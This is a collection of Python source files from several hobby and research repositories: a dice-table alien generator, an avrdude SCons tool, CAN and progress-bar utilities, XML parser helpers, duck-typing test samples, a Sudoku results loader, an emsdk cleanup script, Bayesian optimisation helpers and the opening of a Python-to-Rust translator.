dwelling = 'Water'
habitat = waterHab[rollC]
return dwelling, habitat
def locomotion(self):
# *** Table *** #
primary = {
'Artic' : {
2 : 'Immobile',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Swimming',
6 : 'Swimming',
7 : 'Digging',
8 : 'Walking',
9 : 'Walking',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Banks' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Floating',
5 : 'Sailing',
6 : 'Swimming',
7 : 'Swimming',
8 : 'Swimming',
9 : 'Winged Flight',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Open Ocean' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Floating',
5 : 'Sailing',
6 : 'Swimming',
7 : 'Swimming',
8 : 'Swimming',
9 : 'Winged Flight',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Deep-Ocean Vents' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Immobile',
5 : 'Immobile',
6 : 'Floating',
7 : 'Digging',
8 : 'Walking',
9 : 'Walking',
10 : 'Swimming',
11 : 'Swimming',
12 : 'Swimming',
13 : 'Swimming'},
'Reef' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Immobile',
5 : 'Immobile',
6 : 'Floating',
7 : 'Digging',
8 : 'Walking',
9 : 'Walking',
10 : 'Swimming',
11 : 'Swimming',
12 : 'Swimming',
13 : 'Swimming'},
'Desert' : {
2 : 'Immobile',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Digging',
6 : 'Walking',
7 : 'Walking',
8 : 'Walking',
9 : 'Winged Flight',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Island/Beach' : {
2 : 'Immobile',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Digging',
6 : 'Walking',
7 : 'Walking',
8 : 'Climbing',
9 : 'Swimming',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Tropical Lagoon' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Immobile',
5 : 'Floating',
6 : 'Slithering',
7 : 'Walking',
8 : 'Digging',
9 : 'Swimming',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Fresh-Water Lake' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Floating',
5 : 'Walking',
6 : 'Slithering',
7 : 'Swimming',
8 : 'Swimming',
9 : 'Swimming',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Salt-Water Sea' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Floating',
5 : 'Walking',
6 : 'Slithering',
7 : 'Swimming',
8 : 'Swimming',
9 : 'Swimming',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Mountain' : {
2 : 'Immobile',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Digging',
6 : 'Walking',
7 : 'Walking',
8 : 'Climbing',
9 : 'Winged Flight',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Plains' : {
2 : 'Immobile',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Digging',
6 : 'Walking',
7 : 'Walking',
8 : 'Walking',
9 : 'Winged Flight',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'River/Stream' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Floating',
5 : 'Slithering',
6 : 'Digging',
7 : 'Walking',
8 : 'Swimming',
9 : 'Swimming',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Swampland' : {
2 : 'Immobile',
3 : 'Swimming',
4 : 'Swimming',
5 : 'Swimming',
6 : 'Slithering',
7 : 'Digging',
8 : 'Walking',
9 : 'Climbing',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Woodlands' : {
2 : 'Immobile',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Digging',
6 : 'Walking',
7 : 'Walking',
8 : 'Climbing',
9 : 'Climbing',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Jungle' : {
2 : 'Immobile',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Digging',
6 : 'Walking',
7 : 'Walking',
8 : 'Climbing',
9 : 'Climbing',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Space-Dwelling' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Immobile',
5 : 'Immobile',
6 : 'Immobile',
7 : 'Solar Sail',
8 : 'Solar Sail',
9 : 'Solar Sail',
10 : 'Solar Sail',
11 : 'Solar Sail',
12 : 'Rocket',
13 : 'Rocket'}}
secondary = {
'Climbing' : {
2 : 'Slithering',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Slithering',
6 : 'Slithering',
7 : 'Walking',
8 : 'Walking',
9 : 'Walking',
10 : 'Walking',
11 : 'Walking',
12 : None},
'Digging' : {
'Land' : {
2 : 'Slithering',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Slithering',
6 : 'Slithering',
7 : 'Walking',
8 : 'Walking',
9 : 'Walking',
10 : 'Walking',
11 : 'Walking',
12 : None},
'Water' : {
2 : 'Slithering',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Slithering',
6 : 'Walking',
7 : 'Walking',
8 : 'Swimming',
9 : 'Swimming',
10 : 'Swimming',
11 : 'Swimming',
12 : None}},
'Slithering' : {
2 : 'Swimming',
3 : 'Swimming',
4 : 'Swimming',
5 : 'Swimming',
6 : 'Swimming',
7 : 'Swimming',
8 : 'Swimming',
9 : 'Swimming',
10 : 'Swimming',
11 : None,
12 : None},
'Swimming' : {
2 : 'Slithering',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Slithering',
6 : 'Slithering',
7 : 'Walking',
8 : 'Walking',
9 : 'Walking',
10 : None,
11 : None,
12 : None},
'Walking' : {
2 : 'Swimming',
3 : 'Swimming',
4 : 'Swimming',
5 : 'Swimming',
6 : 'Swimming',
7 : 'Swimming',
8 : 'Swimming',
9 : None,
10 : None,
11 : None,
12 : None},
'Winged Flight' : {
2 : 'Climbing',
3 : 'Climbing',
4 : 'Climbing',
5 : 'Climbing',
6 : 'Swimming',
7 : 'Swimming',
8 : 'Walking',
9 : 'Walking',
10 : 'Walking',
11 : 'Slithering',
12 : None}}
# *** Dice Roller *** #
rollA = F.rollDice(6, 2)
rollB = F.rollDice(6, 2)
rollC = F.rollDice(6, 2)
# *** Modifiers *** #
if any(t in self.trophicLevel for t in ('Pouncing Carnivore', 'Chasing Carnivore', 'Omnivore', 'Gathering Herbivore', 'Scavenger')):
rollA += 1
# *** Primary *** #
primaryL = primary[self.habitat][rollA]
secondaryL = None
tertiaryL = None
# *** Secondary *** #
try:
if primaryL == 'Digging':
secondaryL = secondary[primaryL][self.dwelling][rollB]
else:
secondaryL = secondary[primaryL][rollB]
except:
secondaryL = None
# *** Tertiary *** #
try:
if primaryL == 'Digging':
if self.dwelling == 'Water':
if secondaryL in ('Slithering', 'Walking'):
tertiaryL = secondary[secondaryL][rollC]
elif primaryL == 'Winged Flight':
if secondaryL in ('Climbing', 'Swimming', 'Slithering'):
tertiaryL = secondary[secondaryL][rollC]
except:
tertiaryL = None
return primaryL, secondaryL, tertiaryL
def sapience(self):
# *** Dice Roller *** #
roll = F.rollDice(100, 1)
# *** Sapience *** #
sapience = ''
if roll > 95:
sapience = 'Sapient'
else:
sapience = 'Ordinary'
return sapience
def size(self):
# *** Tables *** #
table = {
'Small' : {
1 : [0.05, 0.003, -10],
2 : [0.07, 0.01, -9],
3 : [0.1, 0.025, -8],
4 : [0.15, 0.08, -7],
5 : [0.2, 0.2, -6],
6 : [0.3, 1, -5]},
'Human' : {
1 : [0.5, 4, -4],
2 : [0.7, 9, -3],
3 : [1, 25, -2],
4 : [1.5, 80, -1],
5 : [2, 200, 0],
6 : [3, 600, 1]},
'Large' : {
1 : [5, 3000, 2],
2 : [7, 8000, 3],
3 : [10, 24000, 4],
4 : [15, 80000, 5],
5 : [20, 200000, 6],
6 : [F.rollDice(6, 2) * 10, 200000, 7]},
'Gravity' : {
3 : [5.00, 0.30],
4 : [3.50, 0.40],
5 : [2.50, 0.50],
6 : [2.00, 0.60],
7 : [1.50, 0.75],
8 : [1.25, 0.90],
9 : [1.00, 1.00],
10 : [0.90, 1.10],
11 : [0.80, 1.20],
12 : [0.70, 1.30],
13 : [0.60, 1.40],
14 : [0.50, 1.60],
15 : [0.40, 1.80],
16 : [0.30, 2.20],
17 : [0.20, 2.90],
18 : [0.10, 4.60]}}
# *** Dice Roller *** #
rollA = F.rollDice(6, 1)
rollB = F.rollDice(6, 1)
rollC = F.rollDice(6, 3)
# *** Modifiers Size Class *** #
gravity = table['Gravity'][rollC][0]
if self.chemicalBasis == 'Magnetic Life':
rollA -= 4
if 'Parasite/Symbiont' in self.trophicLevel:
rollA -= 4
if self.primaryLocomotion == 'Winged Flight':
rollA -= 3
if gravity > 2:
rollA -= 2
if 1.5 <= gravity <= 2:
rollA -= 1
if self.habitat == 'Tropical Lagoon':
rollA -= 1
if self.habitat == 'River/Stream':
rollA -= 1
if self.habitat == 'Island/Beach':
rollA -= 1
if self.habitat == 'Desert':
rollA -= 1
if self.habitat == 'Mountain':
rollA -= 1
if 0.5 <= gravity <= 0.75:
rollA += 1
if self.habitat == 'Plains':
rollA += 1
if self.habitat == 'Open Ocean':
rollA += 1
if self.habitat == 'Banks':
rollA += 1
if 'Grazing' in self.trophicLevel:
rollA += 1
if self.dwelling == 'Water':
rollA += 1
if gravity <= 0.4:
rollA +=2
if self.habitat == 'Space-Dwelling':
rollA += 3
# *** Size Class *** #
if rollA <= 2:
sizeClass = 'Small'
elif rollA >= 5:
sizeClass = 'Large'
else:
sizeClass = 'Human'
# *** Size | Weight | Modifier
size = table[sizeClass][rollB][0]
weight = table[sizeClass][rollB][1]
sizeMod = table[sizeClass][rollB][2]
# *** Size | Weight | Size Mod | Modifiers *** #
if 'Silicon' in self.chemicalBasis:
weight *= 2
if self.chemicalBasis == 'Magnetic Life':
size /= 1000
if self.chemicalBasis == 'Hydrogen-Based Life' or self.chemicalBasis == 'Plasma Life':
weight /= 10
if self.habitat == 'Space-Dwelling':
weight /= 5
# *** Randomize Weight *** #
start, stop = weight / 2, weight * 2
if start != 0:
weight = F.randWeight(start, stop)
weight = float('{:.2f}'.format(weight))
# *** Strength *** #
strength = 2 * (weight ** (1.0/3.0))
strength = round(strength)
return sizeClass, size, weight, sizeMod, strength, gravity
def trophicLevel(self, loop):
# *** Tables *** #
ordinary = {
3 : 'Combined',
4 : 'Autotroph',
5 : 'Decomposer',
6 : 'Scavenger',
7 : 'Omnivore',
8 : 'Gathering Herbivore',
9 : 'Gathering Herbivore',
10 : 'Grazing/Browsing Herbivore',
11 : 'Grazing/Browsing Herbivore',
12 : 'Pouncing Carnivore',
13 : 'Chasing Carnivore',
14 : 'Trapping Carnivore',
15 : 'Hijacking Carnivore',
16 : 'Filter-Feeder',
17 : 'Parasite/Symbiont',
18 : 'Parasite/Symbiont'}
sapient = {
3 : 'Combined',
4 : 'Parasite/Symbiont',
5 : 'Filter-Feeder',
6 : 'Pouncing Carnivore',
7 : 'Scavenger',
8 : 'Gathering Herbivore',
9 : 'Gathering Herbivore',
10 : 'Omnivore',
11 : 'Chasing Carnivore',
12 : 'Chasing Carnivore',
13 : 'Grazing Herbivore',
14 : 'Hijacking Carnivore',
15 : 'Trapping Carnivore',
16 : 'Trapping Carnivore',
17 : 'Decomposer',
18 : 'Autotroph'}
autotroph = {
1 : 'Photosynthesis',
2 : 'Photosynthesis',
3 : 'Photosynthesis',
4 : 'Chemosynthesis',
5 : 'Chemosynthesis',
6 : 'Other'}
# *** Dice Roller *** #
rollA = F.rollDice(6, 3)
rollB = F.rollDice(3, 1)
rollC = F.rollDice(6, 1)
# *** Trophic Level *** #
trophicLevel = ''
if self.sapience == 'Sapient':
trophicLevel = sapient[rollA]
else:
trophicLevel = ordinary[rollA]
# *** Edge Cases *** #
if trophicLevel == 'Autotroph':
if self.habitat == 'Deep-Ocean Vents':
trophicLevel += ': {}'.format(autotroph[3 + rollB])
else:
trophicLevel += ': {}'.format(autotroph[rollC])
if trophicLevel == 'Filter-Feeder':
if self.habitat in ('Artic', 'Desert'):
trophicLevel = 'Trapping Carnivore'
if trophicLevel == 'Combined':
if loop == 0:
trophicLevelA = Alien.trophicLevel(self, 1)
trophicLevelB = Alien.trophicLevel(self, 1)
trophicLevel += ': {} | {}'.format(trophicLevelA, trophicLevelB)
else:
trophicLevel = Alien.trophicLevel(self, 1)
return trophicLevel
# *** Functions *** #
def main():
entries = 1000
counter = 0
print('Starting Alien Creation...')
for i in range(1, entries + 1, 1):
alien = Alien()
if alien.chemicalBasis == 'Machine Life':
alien.attributes()
print('\n')
print('Finished Alien Creation...')
print('{} Entries Created...'.format(entries))
# print('{} Entries with Strength >= 100'.format(counter))
# print('{} Percent of Total Entries'.format(counter / entries * 100))
# *** Main *** #
if __name__ == '__main__':
main()
``` |
{
"source": "jrahlf/3D-Non-Contact-Laser-Profilometer",
"score": 2
} |
#### File: scons/site_tools/avrdude.py
```python
import platform
from SCons.Script import *
# -----------------------------------------------------------------------------
def avrdude_flash(env, source, eeprom_source='', alias='avrdude_program'):
actionString = '$AVRDUDE -p $AVR_DEVICE -c $AVRDUDE_PROGRAMMER -P $AVRDUDE_PORT $AVRDUDE_OPTIONS -U flash:w:'
if platform.system() == "Windows":
# avrdude on Windows has problems with absolute path names.
# The leading drive letter plus colon backslash (e.g. "c:\path")
# gets confused with the colon used as argument separator.
#
# To avoid this problem we try to use relative path names if
# possible.
filename = str(source[0])
if os.path.isabs(filename):
filename = os.path.relpath(filename)
filename = filename.replace("\\", "/")
actionString += filename
if (eeprom_source != ''):
filename = str(eeprom_source[0])
if os.path.isabs(filename):
filename = os.path.relpath(filename)
filename = filename.replace("\\", "/")
actionString += "-U eeprom:w:" + filename
if env.get('AVRDUDE_BAUDRATE') != []:
actionString += " -b $AVRDUDE_BAUDRATE"
action = Action(actionString, cmdstr="$AVRDUDE_COMSTR")
return env.AlwaysBuild(env.Alias(alias, source, action))
else:
actionString += "$SOURCE"
if (eeprom_source != ''):
actionString += " -U eeprom:w:" + str(eeprom_source[0])
if env.get('AVRDUDE_BAUDRATE') != []:
actionString += " -b $AVRDUDE_BAUDRATE"
action = Action(actionString, cmdstr="$AVRDUDE_COMSTR")
return env.AlwaysBuild(env.Alias(alias, source, action))
def avrdude_fuse(env, alias='avrdude_fuse'):
fusebits = []
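# AVR_FUSEBITS is expected to be a list of single-entry dicts, e.g. [{'lfuse': '0xe2'}, {'hfuse': '0xd9'}] (example values only).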
for fusebit in env['AVR_FUSEBITS']:
key, value = fusebit.items()[0]
fusebits.append("-U %s:w:0x%02x:m" % (key, int(value, 0)))
actionString = "$AVRDUDE -p $AVR_DEVICE -c $AVRDUDE_PROGRAMMER -P $AVRDUDE_PORT $AVRDUDE_OPTIONS -u %s" % " ".join(fusebits)
if env.get('AVRDUDE_BAUDRATE') != []:
actionString += " -b $AVRDUDE_BAUDRATE"
action = Action(actionString,
cmdstr="$AVRDUDE_FUSECOMSTR")
return env.AlwaysBuild(env.Alias(alias, [], action))
# -----------------------------------------------------------------------------
def generate(env, **kw):
# build messages
if ARGUMENTS.get('verbose') != '1':
env['AVRDUDE_COMSTR'] = "avrdude: program $SOURCE"
env['AVRDUDE_FUSECOMSTR'] = "avrdude: set fusebits"
env['AVRDUDE'] = 'avrdude'
env.AddMethod(avrdude_flash, 'Avrdude')
env.AddMethod(avrdude_fuse, 'AvrdudeFuses')
def exists(env):
return env.Detect('avrdude')
```
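A possible way to hook this tool into an `SConstruct` is sketched below; the tool path, device, programmer, port and fuse values are placeholders rather than values taken from this project:
```python
# Hypothetical SConstruct snippet for the avrdude tool above.
# Inside an SConstruct, Environment() is provided by SCons; the construction
# variables listed here are the ones the tool reads, with example values only.
env = Environment(
    tools=['default', 'avrdude'],
    toolpath=['scons/site_tools'],
    AVR_DEVICE='atmega328p',
    AVRDUDE_PROGRAMMER='arduino',
    AVRDUDE_PORT='/dev/ttyUSB0',
    AVRDUDE_OPTIONS='',
    AVRDUDE_BAUDRATE=[],                       # [] suppresses the -b flag
    AVR_FUSEBITS=[{'lfuse': '0xe2'}, {'hfuse': '0xd9'}],
)
# Flash an already-built hex file and expose 'program' / 'fuse' aliases
env.Avrdude(['build/firmware.hex'], alias='program')
env.AvrdudeFuses(alias='fuse')
```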
#### File: can/host/message_dispatcher.py
```python
class MessageDispatcher:
def __init__(self, filterList = None):
"""Constructor"""
self.filter = []
if filterList:
for filter in filterList:
self.addFilter(filter)
def addFilter(self, filter):
"""Add a filter
The filter-object must feature a check(message) method which returns
True or False whether the callback should be called or not and a
getCallback() method to retrieve this callback function.
"""
self.filter.append(filter)
def removeFilter(self, filter):
"""Remove this Filter"""
self.filter.remove(filter)
def send(self, message):
pass
def _processMessage(self, message):
"""Check all filter for this message and call the callback
functions for those how matches.
"""
for filter in self.filter:
if filter.check(message):
self._executeCallback(filter.getCallback(), message)
def _executeCallback(self, callback, message):
"""Call a callback function."""
callback(message)
```
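The filter protocol that `addFilter` describes is easy to satisfy; a minimal sketch (class name, message shape and callback are invented for the example, and `MessageDispatcher` is the class defined above) could look like this:
```python
# Illustrative only -- the dispatcher just needs check() and getCallback().
class PredicateFilter:
    def __init__(self, predicate, callback):
        self.predicate = predicate
        self.callback = callback

    def check(self, message):
        # Decide whether the callback should fire for this message
        return self.predicate(message)

    def getCallback(self):
        return self.callback

def on_match(message):
    print(message)

# Dispatch only messages whose (hypothetical) 'id' attribute equals 0x42
dispatcher = MessageDispatcher([
    PredicateFilter(lambda msg: getattr(msg, 'id', None) == 0x42, on_match)
])
# dispatcher._processMessage(message) would now call on_match for matches.
```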
#### File: host/util/progressbar.py
```python
import sys
class ProgressBar:
""" Erstellt eine text-basierte Statusanzeige.
Um den Fortschrittsbalken anzuzeigen ruft man das Objekt als Funktion auf.
Das koennte zum Beispiel so aussehen:
>>> foo = ProgressBar(width=40)
>>> foo(22)
[=======> 22% ]
Beim erstellen kann man ausserdem den Maximal/Minimalwert und die Breite
angeben. Die Breite entspricht der kompletten Anzeige inklusive der
oeffnenden bzw. schliessenden Klammern
"""
def __init__(self, min = 0, max = 100, width = 80):
self.progbar = ""
self.min = min
self.max = max
self.width = width
self.value = 0
self.update(0)
def update(self, value = 0):
""" Aktualisiert den Fortschrittsbalken.
Wenn value ausserhalb der Maximalen Grenzen liegt wird es auf den
den Minimal bzw. Maximalwert begrenzt.
"""
if value < self.min: value = self.min
if value > self.max: value = self.max
if value == self.value:
return False
self.value = value
# Work out what percentage is done
percent_done = (float(value - self.min) /
float(self.max - self.min)) * 100.0
percent_done = int(round(percent_done))
max_char = self.width - 2
num_hashes = int(round((percent_done / 100.0) * max_char))
if num_hashes == 0:
self.progbar = "[>%s]" % (' '*(max_char-1))
elif num_hashes == max_char:
self.progbar = "[%s]" % ('='*max_char)
else:
self.progbar = "[%s>%s]" % ('='*(num_hashes-1),
' '*(max_char-num_hashes))
# Place the percentage readout roughly in the middle.
percent_position = (len(self.progbar) / 2) - len(str(percent_done))
percent_str = str(percent_done) + "%"
self.progbar = ''.join([self.progbar[0:percent_position], percent_str,
self.progbar[percent_position+len(percent_str):]])
return True
def __str__(self):
""" Gibt den aktuellen Fortschrittsbalken aus.
Die Laenge des zurueckgegebenen Strings entspricht dem Wert von "width" der
beim erzeugen des Objekts mitgegeben wurde (Standardwert ist 80).
"""
return str(self.progbar)
def __call__(self, value):
""" Aktualisiert die Statusanzeige und gibt sie auf den stdout-Stream
aus falls sie sich geaendert hat.
Schreibt als erstes ein "carrige return" sodass die aktuelle Zeile
ueberschrieben wird.
"""
if self.update(value):
progbar = str(self)
sys.stdout.write("\r" + progbar)
sys.stdout.flush()
# Small test program for the ProgressBar class
#
# Prints a 60-character-wide progress bar on the console
# that slowly runs from 0 to 100 %.
if __name__ == '__main__':
import time
bar = ProgressBar(width=60)
for x in range(0,101):
time.sleep(0.10)
bar(x)
print ""
```
#### File: system_design/xmlparser/utils.py
```python
import re
import copy
from parser_exception import ParserException
def check_name(name):
""" Checks if a string comply with some rules for the notation
of a name.
"""
if not re.match("^([A-Z]?[a-z0-9]* )*([A-Z]?[a-z0-9]*)$", name):
raise ParserException("Error in name '%s'. Check Spelling or Case. Allowed are only Names matching '^([A-Z]?[a-z0-9]* )*([A-Z]?[a-z0-9]*)$' " % name)
class SortedDictionary(dict):
"""
A dictionary with an Iterator which sorts the output
"""
def __iter__(self):
class Iterator:
def __init__(self, list):
self.list = list
self.list.sort()
def __iter__(self):
return self
def next(self):
try:
item = self.list.pop(0)
return item
except IndexError:
raise StopIteration()
return Iterator(self.values())
def iter(self):
return self.__iter__()
class SingleAssignDictionary(SortedDictionary):
""" A dictionary which don't allow overwriting attributes after
the initial creation.
"""
def __init__(self, name):
self.name = name
SortedDictionary.__init__(self)
def __setitem__(self, key, item):
if not self.has_key(key):
SortedDictionary.__setitem__(self, key, item)
else:
raise ParserException("%s '%s' defined twice!" % (self.name.capitalize(), key))
def remove(self, key):
SortedDictionary.pop(self, key)
def replace(self, key, item):
SortedDictionary.__setitem__(self, key, item)
def update(self, other):
for element in other:
try:
# try to update an already existing element
# from this component with the values from the
# toplevel component
SortedDictionary.__getitem__(self, element.name).update(element)
except KeyError:
# no element found, inherit the full top element
SortedDictionary.__setitem__(self, element.name, element)
def copy(self):
""" Create a shallow copy """
return copy.copy(self)
``` |
{
"source": "jrahm/DuckTest",
"score": 2
} |
#### File: presentation/code/body.py
```python
def test_walk(duck):
duck.walk()
def ruffle(duck):
duck.feathers()
def test_feathers(duck):
duck.quack()
ruffle(duck)
duck = Duck()
person = Person()
test_walk(duck)
test_walk(person)
test_feathers(duck)
test_feathers(person)
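# Note: test_walk succeeds for both objects, but test_feathers(person) fails at runtime
# with an AttributeError because Person defines no feathers() -- the kind of latent
# error a static checker like DuckTest aims to flag.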
```
#### File: presentation/code/duck.py
```python
class Duck:
def __init__(self):
print("Duck!")
def walk(self):
print("Waddle")
def quack(self):
print("Quack!")
def feathers(self):
print("Ruffle")
```
#### File: presentation/code/person.py
```python
class Person:
def __init__(self):
print("Person!")
def walk(self):
print("Walk")
def quack(self):
print("\"Quock!\"")
```
#### File: DuckTest/tests/linkedlist.py
```python
class LinkedList:
def __init__(self):
self.next = None
def add(self):
self.next = LinkedList()
print (LinkedList().next.next.data)
```
#### File: DuckTest/tests/test_return.py
```python
import sys
def my_function(x):
return 2
def my_str_fn():
return "immastring"
def my_function2(x):
if x:
return set()
else:
return "x"
def my_void_function(y):
print (y)
def my_dead_code_function(z):
print (z)
if z:
return
print (z)
def is_eq(x, y):
return x == y
x = my_function2()
is_eq(x, "test")
sys.argv.append(x)
``` |
{
"source": "jrahm/Sudoku",
"score": 3
} |
#### File: Sudoku/runs/database.py
```python
import sqlite3
import glob
class Run:
def __init__(self):
self.n = 0
self.hints = 0
self.solution_grid = None
self.input_grid = None
self.output_grid = None
self.time_millis = 0
def __str__(self):
return "{n = %d, hints = %d, solution = %s, input = %s, output = %s, time = %d}" % \
(self.n, self.hints, self.solution_grid, self.input_grid, self.output_grid, self.time_millis)
def insert(self, cursor):
cursor.execute("insert into runs (n, hints, solution_grid, input_grid, output_grid, time_millis) values (%d, %d, %s, %s, %s, %d)" %\
(self.n, self.hints, self.solution_grid, self.input_grid, self.output_grid, self.time_millis))
def split_list(lst):
ret = []
current = []
for l in lst:
if l == '':
if current != []:
ret.append(current)
current = []
else:
current.append(l)
ret.append(current)
return ret
def load_run(fname):
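# Filenames are expected to look like 'run-<n>-<hints>-<index>.<ext>'
# (e.g. 'run-9-30-001.txt', illustrative), matching the glob('run*') pattern below.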
try:
_, n, nhints, number = fname.split('-')
number, _ = number.split('.')
fd = open(fname)
ret_run = Run()
lines = [x.strip() for x in fd.readlines()]
lines = split_list(lines)
ret_run.n = int(n)
ret_run.hints = int(nhints)
if lines[0][0] == 'Timeout':
ret_run.solution_grid = 'NULL'
ret_run.input_grid = 'NULL'
ret_run.output_grid = 'NULL'
ret_run.time_millis = 600000
else:
ret_run.solution_grid = "'" + ''.join(lines[0]) + "'"
ret_run.input_grid = "'" + ''.join(lines[1]) + "'"
ret_run.output_grid = "'" + ''.join(lines[2]) + "'"
ret_run.time_millis = int(lines[3][0][6:])
return ret_run
except IOError as e:
print(e)
return None
connection = sqlite3.connect('database.db')
cursor = connection.cursor()
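# The 'runs' table must already exist in database.db; a schema along these
# lines would match Run.insert() above (column types are an assumption):
#   CREATE TABLE IF NOT EXISTS runs (n INTEGER, hints INTEGER, solution_grid TEXT,
#       input_grid TEXT, output_grid TEXT, time_millis INTEGER);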
filenames = glob.glob('run*')
for fname in filenames:
run = load_run(fname)
print (run)
run.insert(cursor)
connection.commit()
connection.close()
``` |
{
"source": "JRahnama/runtime",
"score": 3
} |
#### File: mono/wasm/sanitize.py
```python
import sys, json, os, shutil
def glob(path):
return [os.path.join(path, filename) for filename in os.listdir(path)]
def remove(*paths):
for path in paths:
path = os.path.abspath(path)
try:
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
except OSError as error:
print(error)
def rewrite_package_json(path):
package = open(path,"rb+")
settings = json.load(package)
settings["devDependencies"] = {}
package.seek(0)
package.truncate()
json.dump(settings, package, indent=4)
package.close()
emsdk_path = sys.argv[1]
emscripten_path = os.path.join(emsdk_path, "upstream", "emscripten")
node_root = os.path.join(emsdk_path, "node")
node_paths = glob(node_root)
upgrade = False
npm = os.path.join(node_paths[0], "bin", "npm")
if not os.path.exists(npm):
npm = "npm"
def update_npm(path):
try:
os.chdir(os.path.join(path, "lib"))
os.system(npm + " install npm@latest")
prune()
except OSError as error:
print("npm update failed")
print(error)
def remove_npm(path):
os.chdir(path)
remove("bin/npx", "bin/npm", "include", "lib", "share")
def prune():
try:
os.system(npm + " prune --production")
except OSError as error:
print("npm prune failed")
print(error)
os.chdir(emscripten_path)
rewrite_package_json("package.json")
prune()
remove("tests",
"node_modules/google-closure-compiler",
"node_modules/google-closure-compiler-java",
"node_modules/google-closure-compiler-osx",
"node_modules/google-closure-compiler-windows",
"node_modules/google-closure-compiler-linux",
"third_party/closure-compiler",
"third_party/jni",
"third_party/ply",
"third_party/uglify-js",
"third_party/websockify")
for path in node_paths:
if upgrade:
update_npm(path)
else:
remove_npm(path)
``` |
{
"source": "JRaidal/Bayesian2D",
"score": 3
} |
#### File: Bayesian2D/tools/acquisition.py
```python
import numpy
from warnings import catch_warnings, simplefilter
from scipy.stats import norm
from sklearn import preprocessing
# Local helpers; these import paths are assumed from the package layout shown here
from Bayesian2D.tools.surrogate import surrogate
from Bayesian2D.tools.create_random import create_random
def acquisition(XY, x_bounds, y_bounds, e, model, max_min, n_random):
'''
Creates sample points and finds the one most likely to improve the function when
evaluating.
Parameters
----------
XY : numpy array
Array of all points evaluated so far.
x_bounds : list
Two element list of x-axis boundaries for the function.
y_bounds : list
Two element list of y-axis boundaries for the function.
e : float
Exploration parameter.
The default is 0.2.
model : sklearn.gaussian_process
Some Gaussian process model.
max_min : str
Specifies whether the algorithm is searching for maxima or minima.
n_random : int
Number of random points to be created.
The default is 50000.
Returns
-------
X_best : float
x-coordinate of point with maximum probability of improvement.
Y_best : float
y-coordinate of point with maximum probability of improvement.
'''
# Find the best surrogate mean found so far
z_surrogate, _ = surrogate(model, XY)
if max_min == 'maximum':
best = numpy.max(z_surrogate)
if max_min == 'minimum':
best = numpy.min(z_surrogate)
#Extract random points
XYsamples = create_random(x_bounds, y_bounds, n_random)
# Find the mean and standard deviation of the sample points
mu, std = surrogate(model, XYsamples)
# Calculate the maximum probability of improvement
r=(mu-best)
c=(r)/(std+1e-9)
with catch_warnings():
# Ignore scaling warnings (not true)
simplefilter("ignore")
c= preprocessing.scale(c)
scores=norm.cdf(c - e)
# Find point with best score
if max_min == 'maximum':
index_max = (numpy.argwhere(scores == numpy.max(scores)))
if max_min == 'minimum':
index_max = (numpy.argwhere(scores == numpy.min(scores)))
ix_max = index_max[0,0]
X_max, Y_max = XYsamples[ix_max]
X_best = float(X_max)
Y_best = float(Y_max)
return X_best, Y_best
```
#### File: Bayesian2D/tools/surrogate.py
```python
def surrogate(model, XY):
'''
Predicts the mean and standard deviation of points using Gaussian processes
Parameters
----------
model : sklearn.gaussian_process
Some Gaussian process model.
XY : numpy array
Array of x and y coordinates.
Returns
-------
array, array
Returns mean and standard deviation arrays for evaluated points.
'''
return model.predict(XY, return_std=True)
``` |
{
"source": "JRainbowOS/pypyrust",
"score": 3
} |
#### File: JRainbowOS/pypyrust/rust_generator.py
```python
import ast
import sys
from enum import Enum
import filecmp
import os
from var_analyser import VariableAnalyser, type_from_annotation
OPEN_BRACE = '{'
CLOSE_BRACE = '}'
# ALLOWED_BINARY_OPERATORS = { "Add", "Mult", "Sub", "Div", "FloorDiv",
# "Mod", "LShift", "RShift", "BitOr", "BitXor", "BitAnd" }
ALLOWED_COMPARISON_OPERATORS = { "Eq", "NotEq", "Lt", "LtE", "Gt", "GtE" }
REPLACE_CONSTANTS = {
True : "true",
False : "false",
}
# Fortunately, the precedence of Python operators is the same as Rust,
# except for ** (doesn't exist in Rust), is/in (don't exist in Rust), and
# "not", which has very high precedence in Rust but sits just above the
# other boolean operators in Python.
OPERATOR_PRECEDENCE = {
"Pow": 12,
"UAdd": 11, "USub": 11, "Invert": 11, "Not": 11,
